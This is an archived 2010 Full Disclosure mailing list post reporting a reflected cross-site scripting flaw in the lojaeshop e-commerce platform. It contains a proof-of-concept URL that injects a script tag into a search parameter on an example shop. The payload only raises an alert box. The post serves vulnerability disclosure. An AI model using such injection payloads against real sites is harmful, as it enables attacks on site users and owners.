Full Disclosure mailing list archives
XSS in lojaeshop ecommerce
From: primehaxor <primehaxor () gmail com>
Date: Thu, 30 Sep 2010 18:42:40 -0300
Hey, Just looking around and found this e-commerce, this one sell shops based on templates and type of business. POC: this is example shop ;P http://www.lojaeshop.com.br/index?page=search/search_error&error=not_found&_keyword=guineh%22/%3E%3C/script%3E%3Cscript%3Ealert%28%22guineapig%22%29%3C/script%3E Isn't validating () in hex code. sry about english... Cya, primehaxor _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- XSS in a lot of products <b>pepelotas</b> (Sep 29)
- Re: XSS in a lot of products rancor (Sep 30)
- Re: XSS in a lot of products Benji (Sep 30)
- Re: XSS in a lot of products Jeffrey Walton (Sep 30)
- <Possible follow-ups>
- Re: XSS in a lot of products hackyouridols (Sep 30)
- XSS in lojaeshop ecommerce primehaxor (Sep 30)
- Re: XSS in a lot of products rancor (Sep 30)